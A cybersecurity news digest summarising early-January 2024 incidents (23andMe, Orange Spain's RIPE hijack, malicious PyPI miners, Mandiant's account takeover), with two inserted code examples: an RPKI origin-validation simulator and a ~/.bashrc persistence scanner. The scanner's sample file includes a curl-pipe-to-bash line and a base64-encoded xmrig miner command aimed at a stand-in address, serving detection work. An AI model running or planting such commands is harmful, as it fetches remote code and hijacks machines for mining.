Daily Brief
Find articles below; see 'DETAILS' for generated summaries.
Total articles found: 11755
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-01-04 18:32:13 | theregister | DATA BREACH | 23andMe Faces Criticism for Shifting Blame in User Data Breach | 23andMe suffered a credential-stuffing attack that exposed data on 6.9 million users: attackers logged in with reused credentials and then scraped data on other users through the DNA Relatives feature.
The company blames the breach on users reusing passwords that had been compromised in unrelated security incidents.
A lawsuit alleges the biotech firm failed to maintain reasonable security measures, which 23andMe denies.
The company did not require two-factor authentication (2FA) prior to the breach but claims to have supported it since 2019.
Infosec professionals criticize the response, arguing the company should have had stronger controls in place, such as mandatory 2FA and screening of passwords against known-compromised credentials.
Many in the industry call for checking new passwords against services such as Have I Been Pwned at account creation and alerting users when a credential is already known to be compromised.
Despite some industry support for the company's stance, the predominant view is that organizations are responsible for securing user data and should not blame users for breaches. | Details |
| 2024-01-04 16:17:50 | bleepingcomputer | CYBERCRIME | Zeppelin Ransomware Source Code Illegally Sold on Dark Web Forum | A threat actor has reportedly sold the source code and a cracked version of the Zeppelin ransomware builder for $500 on a hacker forum.
The sale was identified by threat intelligence company KELA, though the authenticity of the offered package has not yet been confirmed.
The acquisition of the source code could lead to the establishment of a new ransomware-as-a-service (RaaS) operation or development of new malware based on Zeppelin.
The seller, known by the handle 'RET,' claims to have cracked a licensed copy of the Zeppelin builder and says they are not the malware's author.
Flaws in Zeppelin's encryption scheme allowed a decrypter to be built in 2020, though the seller asserts that the offered version has these weaknesses patched.
Zeppelin, a derivative of the Vega/VegaLocker malware, was active from 2019 to 2022 and was known for double-extortion tactics and large ransom demands; the builder previously sold for up to $2,300.
In 2022 the FBI warned that Zeppelin had adopted an encryption method that applies multiple layers, complicating victims' data recovery. | Details |
| 2024-01-04 14:35:41 | bleepingcomputer | MISCELLANEOUS | FTC Launches $25k Challenge to Combat AI Voice Cloning Frauds | The FTC is offering a $25,000 prize for ideas to detect and prevent AI-enabled voice cloning, which poses risks of fraud.
Voice cloning technology's advancements have sparked concerns about its misuse in acts such as voice phishing and social engineering scams.
The Voice Cloning Challenge is part of an effort to proactively address the security threat posed by sophisticated text-to-speech AI systems.
While voice cloning can benefit those needing assistive communication tools, its potential for abuse in fraudulent schemes is growing.
Potential solutions will be judged on feasibility, impact on corporate accountability, burden on consumer, and adaptability to technological change.
The competition is open for submissions until January 12th, with a detailed proposal and optional demonstration video required.
If the challenge does not produce viable defenses, the FTC sees it as a warning signal that stricter AI regulations may be necessary. | Details |
| 2024-01-04 13:18:23 | theregister | CYBERCRIME | Weak Password and Malware Compromise Orange Spain's Network | Orange Spain suffered a major outage after infostealer malware on an employee's machine harvested the credentials for the company's RIPE NCC account.
The compromised RIPE account was protected by a "ridiculously weak" password ("ripeadmin"), and access to it was enough to disrupt about half of the network's traffic.
The attacker, using the alias "Snow," logged into the RIPE account and used it to tamper with the provider's BGP routing.
RIPE NCC's account portal did not enforce 2FA/MFA or a reasonable password policy, so a single weak, stolen password was all that stood between the attacker and Orange Spain's critical routing records.
The attacker altered the route origin records for Orange's address space, so that some of its BGP routes were treated as invalid and dropped by other networks, causing service outages for customers.
Despite the service disruption, there was no evidence of customer or client data being compromised.
The incident highlights the risk of infostealer malware and poor cybersecurity practices, with experts anticipating potential future similar attacks on other RIPE accounts. | Details |
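Added example, not code from the article or from Orange or RIPE NCC: the damage in this incident came from editing the route origin authorizations (ROAs) that RPKI-validating networks consult to decide whether a BGP announcement's origin AS is legitimate. The script below implements RFC 6811 route origin validation and replays the failure mode: with no ROA the route is merely "not found" and carried; once a bogus ROA naming the attacker's AS exists, the victim's own announcements become "invalid" and are dropped by validating networks until the operator publishes a correct ROA. All prefixes and AS numbers are documentation-reserved values chosen for this example; none of Orange's real data is used.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class ROA:
    """A route origin authorisation as published in the RPKI."""
    prefix: str       # authorised prefix, e.g. "192.0.2.0/24"
    max_length: int   # longest prefix length the origin may announce
    origin_asn: int   # AS number authorised to originate it


def covering_roas(roas: Iterable[ROA], announced_prefix: str) -> List[ROA]:
    """ROAs whose prefix covers (equals or contains) the announced prefix."""
    net = ipaddress.ip_network(announced_prefix)
    out = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix)
        # Same address family only; subnet_of() raises on a v4/v6 mix.
        if roa_net.version == net.version and net.subnet_of(roa_net):
            out.append(roa)
    return out


def validate_origin(roas: Iterable[ROA], announced_prefix: str, origin_asn: int) -> str:
    """RFC 6811 route origin validation.

    'valid'     - some covering ROA names this origin AS and allows this length
    'invalid'   - covering ROAs exist but none match (wrong origin or too specific)
    'not-found' - no ROA covers the prefix; routers treat it as unverified
    """
    net = ipaddress.ip_network(announced_prefix)
    covering = covering_roas(roas, announced_prefix)
    if not covering:
        return "not-found"
    for roa in covering:
        if roa.origin_asn == origin_asn and net.prefixlen <= roa.max_length:
            return "valid"
    return "invalid"


def simulate_roa_hijack() -> Dict[str, str]:
    """Replay the failure mode: a bogus ROA turns the victim's own routes invalid.

    Constructed scenario: AS64496 (victim) and AS64511 (attacker) are
    documentation AS numbers and 192.0.2.0/24 is TEST-NET-1.
    """
    victim, attacker, prefix = 64496, 64511, "192.0.2.0/24"
    bogus = [ROA(prefix, 24, attacker)]      # what the hijacked account publishes
    corrected = [ROA(prefix, 24, victim)]    # what the operator restores afterwards
    return {
        "no-roa": validate_origin([], prefix, victim),
        "bogus-roa-victim-origin": validate_origin(bogus, prefix, victim),
        "bogus-roa-attacker-origin": validate_origin(bogus, prefix, attacker),
        "corrected-roa-victim-origin": validate_origin(corrected, prefix, victim),
        "corrected-roa-attacker-origin": validate_origin(corrected, prefix, attacker),
    }


if __name__ == "__main__":
    for step, state in simulate_roa_hijack().items():
        print(f"{step:32s} {state}")
```

The max-length check matters as much as the origin check: a ROA for a /22 with max length 22 makes a legitimate /24 announcement from the right AS invalid too, which is a common self-inflicted outage when ROAs are created carelessly.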
| 2024-01-04 12:16:53 | thehackernews | MISCELLANEOUS | Enhancing Security Across Your Software Supply Chain | The US Executive Order on Improving the Nation's Cybersecurity (EO 14028) highlights the importance of securing software supply chains, affecting anyone selling software to federal agencies and, increasingly, the wider industry.
Protecting sensitive information such as API keys and credentials is critical, as shown by high-profile cybersecurity incidents where such data was exposed in plaintext.
Tools like GitGuardian can scan code for inadvertently published secrets or prevent such occurrences, aiding in swift remediation and the prevention of future breaches.
Building a comprehensive Software Bill of Materials (SBOM) with Software Composition Analysis (SCA) tooling helps track dependencies and their known vulnerabilities and makes transparent what a piece of software is built from.
Ethical hacking, a practice that involves the authorized probing of systems for security weaknesses, is crucial for identifying and mitigating potential exploits before software release.
Adopting these proactive security measures and participating in programs like bug bounties can significantly reduce the risk of having to manage incidents post-deployment.
Following the SLSA security framework can move software supply chain security "from 'safe enough' to being as resilient as possible," thus reducing post-deployment clean-up and regulatory reporting. | Details |
| 2024-01-04 11:50:57 | theregister | CYBERCRIME | Combating Ransomware: Law Enforcement Successes and the Need for Robust Legislation | Law enforcement (LE) showed progress against ransomware in 2023, including the takedowns of RagnarLocker and Hive, the dismantling of the Qakbot botnet, and the partial disruption of AlphV/BlackCat.
Despite successful operations by LE, the continued existence and activities of cybercrime groups like AlphV/BlackCat highlight the need for preventative measures beyond takedowns.
AlphV/BlackCat, noteworthy for its reprehensible attacks including the leakage of sensitive patient data, still presents an active threat, revealing the limitations of current enforcement strategies.
Discussions around combating ransomware with legislation include potentially banning ransom payments and outlawing poor security practices, though these approaches come with complications and may impact victims negatively.
The article suggests that accountability and actions on cryptocurrency regulation may disrupt funding to cybercriminals, but current efforts from agencies like the UK's Financial Conduct Authority (FCA) are seen as insufficient.
The fight against ransomware requires not just law enforcement actions but also the introduction of decisive policies and legislation by governments to tackle the issue more effectively.
The challenge lies in crafting legislation that is effective without jeopardizing the operation of critical services like healthcare institutions, which cannot afford significant downtime.
The article underscores the commitment of Western governments in continuing the fight against ransomware, acknowledging LE’s disruption efforts while stressing the need for legislative backing to reinforce and complement these efforts. | Details |
| 2024-01-04 10:39:23 | thehackernews | MALWARE | Malware in Python Packages Mines Cryptocurrency on Linux | Three malicious Python packages were discovered in PyPI targeting Linux systems to deploy cryptocurrency miners.
The packages, named modularseven, driftme, and catme, were downloaded 431 times before removal.
Malicious code within the packages retrieved cryptocurrency mining scripts from remote servers.
The malware operation resembled a previous campaign using a package called culturestreak, using similar domains and hosting strategies.
Newer packages included an extra stage in the payload delivery process to avoid detection by security tools.
Malicious commands were appended to the ~/.bashrc file for persistence, so the miner is relaunched every time the user starts a new interactive shell, including after a reboot.
The sophisticated evasion techniques highlight the importance of enhanced security measures for open-source repositories. | Details |
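Added example, not code from the report or from the packages it describes: a small scanner for the kind of `~/.bashrc` persistence just described. It flags remote-download-to-shell pipelines, base64-decoded payloads, backgrounding with `nohup`, execution out of world-writable directories and miner indicators, and it decodes `echo <base64> | base64 -d` literals and re-scans the decoded text, since that is where the real command usually hides. The rule names, the `scan_shell_rc` API and the sample rc file are this example's own; the sample uses a documentation address and is constructed, not taken from the campaign.

```python
import base64
import re
from typing import List, Tuple

# (rule name, pattern). Deliberately broad: tune per fleet, then triage hits.
RULES = [
    ("download-to-shell", re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|z|da)?sh\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(?:ba|z|da)?sh\b")),
    ("base64-decode", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    ("background-daemon", re.compile(r"\b(?:nohup|setsid|disown)\b")),
    ("world-writable-exec", re.compile(r"(?:^|[\s;&|])(?:/tmp|/var/tmp|/dev/shm)/\S+")),
    ("miner-indicator", re.compile(r"\bxmrig\b|stratum\+(?:tcp|ssl)://|--donate-level", re.I)),
]
# echo <base64> | base64 -d : capture the literal so it can be decoded and re-scanned
B64_ECHO = re.compile(
    r"\becho\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b"
)

Finding = Tuple[int, str, str]  # (line number, rule name, text that matched)


def scan_shell_rc(text: str) -> List[Finding]:
    """Scan an rc file's contents; comments and blank lines are ignored."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for name, rx in RULES:
            if rx.search(line):
                findings.append((lineno, name, line))
        m = B64_ECHO.search(line)
        if m:
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            for name, rx in RULES:
                if rx.search(decoded):
                    findings.append((lineno, "decoded:" + name, decoded))
    return findings


def flagged_lines(text: str) -> List[int]:
    """Distinct line numbers with at least one finding, in order."""
    return sorted({lineno for lineno, _, _ in scan_shell_rc(text)})


# Constructed sample ~/.bashrc: three benign lines, then three persistence lines
# of the kind the report describes. 203.0.113.7 is a documentation address and
# the base64 payload is built here so the sample stays readable.
_PAYLOAD = b"nohup xmrig -o stratum+tcp://203.0.113.7:3333 >/dev/null 2>&1 &"
_B64 = base64.b64encode(_PAYLOAD).decode("ascii")
SAMPLE_BASHRC = "\n".join([
    "# ~/.bashrc (constructed sample)",
    'export PATH="$HOME/.local/bin:$PATH"',
    "alias ll='ls -alF'",
    "[ -f ~/.bash_aliases ] && . ~/.bash_aliases",
    "curl -s http://203.0.113.7/s.sh | bash",
    "nohup /tmp/.x/run >/dev/null 2>&1 &",
    f"echo {_B64} | base64 -d | sh",
])

if __name__ == "__main__":
    for lineno, rule, text in scan_shell_rc(SAMPLE_BASHRC):
        print(f"line {lineno:2d}  {rule:28s} {text[:60]}")
```

Run it over `~/.bashrc`, `~/.profile`, `~/.bash_profile` and the system-wide `/etc/profile.d/*` as part of a host check; a hit is a lead for triage, not a verdict, and the miner rule in particular should be extended with the pool domains seen in your own telemetry.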
| 2024-01-04 10:18:51 | theregister | NATION STATE ACTIVITY | Chinese Balloons Detected Near Taiwan Before Elections | Four Chinese balloons were observed over the Taiwan Strait, with three crossing over Taiwan and near the island's Ching-Chuan-Kang air base.
A separate Chinese balloon, shot down over US airspace in February 2023, reportedly used a US internet provider for navigation and to send data back to China.
After that incident the US blacklisted six entities linked to China's military and the PLA's aerospace programs.
Beijing denied intentional airspace intrusion, yet the Pentagon identified the balloon as having intelligence gathering capabilities.
Taiwan's Ministry of National Defense also tracked PLA aircraft and PLAN vessels around the island and continues to publish updates because such appearances are frequent.
The sighting of balloons over Taiwan's landmass is rare, often described as weather monitoring devices, but their purpose this time remains unconfirmed.
Tensions rise as the balloon sightings precede Taiwan's presidential and parliamentary elections, amidst increasing CCP rhetoric about "reunification." | Details |
| 2024-01-04 09:58:06 | bleepingcomputer | MISCELLANEOUS | Npm 'everything' Package Disrupts JavaScript Registry | Over the holidays the npm registry was flooded with more than 3,000 packages, with serious consequences for other npm authors.
A package named "everything" was published that depends, directly or through its sub-packages, on every package in the npm registry, so installing it quickly exhausts a machine's storage.
Because npm refuses to let authors unpublish a package that others depend on, the existence of "everything" blocked maintainers from removing their own packages.
The package "everything" and its sub-packages created a cumbersome dependency chain that initiated the download of millions of transitive npm packages.
The creator of "everything," PatrickJS, apologized for the unintended disruptions his package caused and has reached out to npm admins for a resolution.
The npm policy preventing package removal if it's a dependency for others came in response to the "left-pad" incident in 2016 to ensure stability in the programming ecosystem.
Even the author of "everything" faces difficulty in removing his packages due to the complex dependency web they created, which ironically is a result of the npm policy designed to prevent such disruptions.
Actions were taken to mitigate the situation, with the "@everything-registry" scoped packages linked to "everything" being set to private, presumably to stop the cascade of downloads. | Details |
| 2024-01-04 09:01:30 | thehackernews | MALWARE | UAC-0050 Group Employs Novel Phishing to Spread Remcos RAT | UAC-0050, identified as a threat actor since 2020, is using sophisticated phishing attacks to distribute the Remcos Remote Access Trojan (RAT).
Recent attacks use a new tactic based on Windows pipes for inter-process communication to evade antivirus and Endpoint Detection and Response (EDR) systems.
The group targets Ukrainian and Polish entities using social engineering, often impersonating legitimate organizations to encourage opening malicious attachments.
One phishing email in the campaign purported to offer consultancy roles with the Israel Defense Forces (IDF) and primarily targeted Ukrainian military personnel.
CERT-UA attributed a phishing campaign to UAC-0050 in Feb 2023, meant for delivering Remcos RAT and occasionally an information stealer named Meduza Stealer.
Analysis of a specific LNK file revealed a complex infection process involving staged script execution and downloading additional payloads for persistence and data harvesting.
The Remcos RAT has capabilities to extract system data and credentials from various web browsers, further compromising the security of infected systems. | Details |
| 2024-01-04 06:33:34 | thehackernews | CYBERCRIME | Mandiant Twitter Account Hijacked for Crypto Scam Operation | American cybersecurity firm Mandiant's Twitter account was hijacked to promote a cryptocurrency scam.
The incident, where the account was renamed and used to impersonate the Phantom crypto wallet service, lasted over six hours.
The scam included a fake airdrop promotion that encouraged users to visit a malicious link.
It's unclear how the breach occurred, but possibilities include MFA bypass or compromise of Twitter Support staff.
Mandiant, a prominent threat intelligence organization, is a subsidiary of Google Cloud following a $5.4 billion acquisition.
Mandiant regained control of their Twitter account; the current security status after the incident has not been detailed.
The hacker's identity remains unknown, and further details are expected when Mandiant issues a statement. | Details |
| 2024-01-04 00:05:28 | theregister | MALWARE | Microsoft Disables Web-Based Windows App Installs Due to Malware | Microsoft has disabled the ms-appinstaller URI protocol after detecting its misuse for malware installation.
The issue echoes a vulnerability from December 2021, which allowed attackers to bypass security measures using App Installer spoofing.
The protocol handler, re-enabled in August 2022, lets users install apps directly from a web page without first downloading the package locally, but threat actors have abused it to deliver malware.
Microsoft is working with certificate authorities to revoke certificates used by identified malware samples.
Enterprises with the EnableMSAppInstallerProtocol group policy set to "Enabled" or not configured, running App Installer versions v1.18.2691 to v1.21.3421 with Windows updates from October 2022 to March 2023, are at risk and should apply the update or set the policy to "Disabled".
This change adds a layer of friction for web-based application installations, requiring additional steps for safe downloading and installation. | Details |
| 2024-01-03 23:37:47 | bleepingcomputer | CYBERCRIME | Mandiant's Twitter Account Hijacked to Promote Crypto Scam | Mandiant's Twitter account was taken over by an attacker to spread a cryptocurrency scam.
The hijacker renamed the account to mimic the Phantom crypto wallet and advertised a fake $PHNTM token airdrop.
Clicking the scam 'Claim Airdrop' button redirects users to install a genuine wallet, which is then exploited to drain funds.
Phantom Wallet has recognized the scam and blocked interaction with the malicious website to safeguard users.
After the scam, the hijacker posted mocking messages to Mandiant and deleted the scam tweet.
The scam included retweets from the official Phantom account to seem legitimate.
Mandiant's original Twitter handle @mandiant is no longer available, displaying an error message that the account does not exist. | Details |
| 2024-01-03 22:55:04 | bleepingcomputer | CYBERCRIME | Mandiant Cybersecurity Firm's Twitter Compromised to Promote Crypto Scam | Mandiant's Twitter account was hijacked to disseminate a cryptocurrency scam, falsely representing the Phantom crypto wallet.
An unauthorized actor took over Mandiant's account, changed its name to @phantomsolw, and advertised a fake airdrop of $PHNTM tokens.
Users clicking on the 'Claim Airdrop' button were directed to a phishing site designed to drain cryptocurrency from their wallets.
The legitimate Phantom wallet service has recognized the threat and disabled interactions with the scam website to protect users.
Although the scam tweet has been deleted, the attacker continued to mock Mandiant with messages suggesting they change their password and check bookmarks.
The hacker is retweeting official posts from Phantom, possibly to gain credibility for potential future scams.
Mandiant's Twitter handle @mandiant is currently inaccessible, displaying a "This account doesn't exist" error message. | Details |
| 2024-01-03 21:31:54 | theregister | DATA BREACH | Estes Express Lines Refuses Ransom Amid Data Breach | Estes Express Lines, a major American freight shipper, experienced a ransomware attack that potentially compromised the personal information of over 21,000 customers.
The attack was first disclosed in early October, with the company eventually admitting the presence of ransomware after initially noting an IT infrastructure impact.
The ransomware gang Lockbit claimed responsibility for the cyberattack and allegedly published the stolen data on November 13.
Estes Express Lines decided not to pay the ransom, in line with FBI and financial regulator recommendations, despite potential risks of data exposure.
Forensic investigations confirmed that personal information, including names and Social Security numbers, was stolen in the breach.
The company has not disclosed specifics of the stolen data, the ransom amount requested, or detailed reasons for not paying the ransom.
Estes is offering 12 months of free identity monitoring services through Kroll to the affected individuals and has not observed any cases of identity theft or financial loss from the incident. | Details |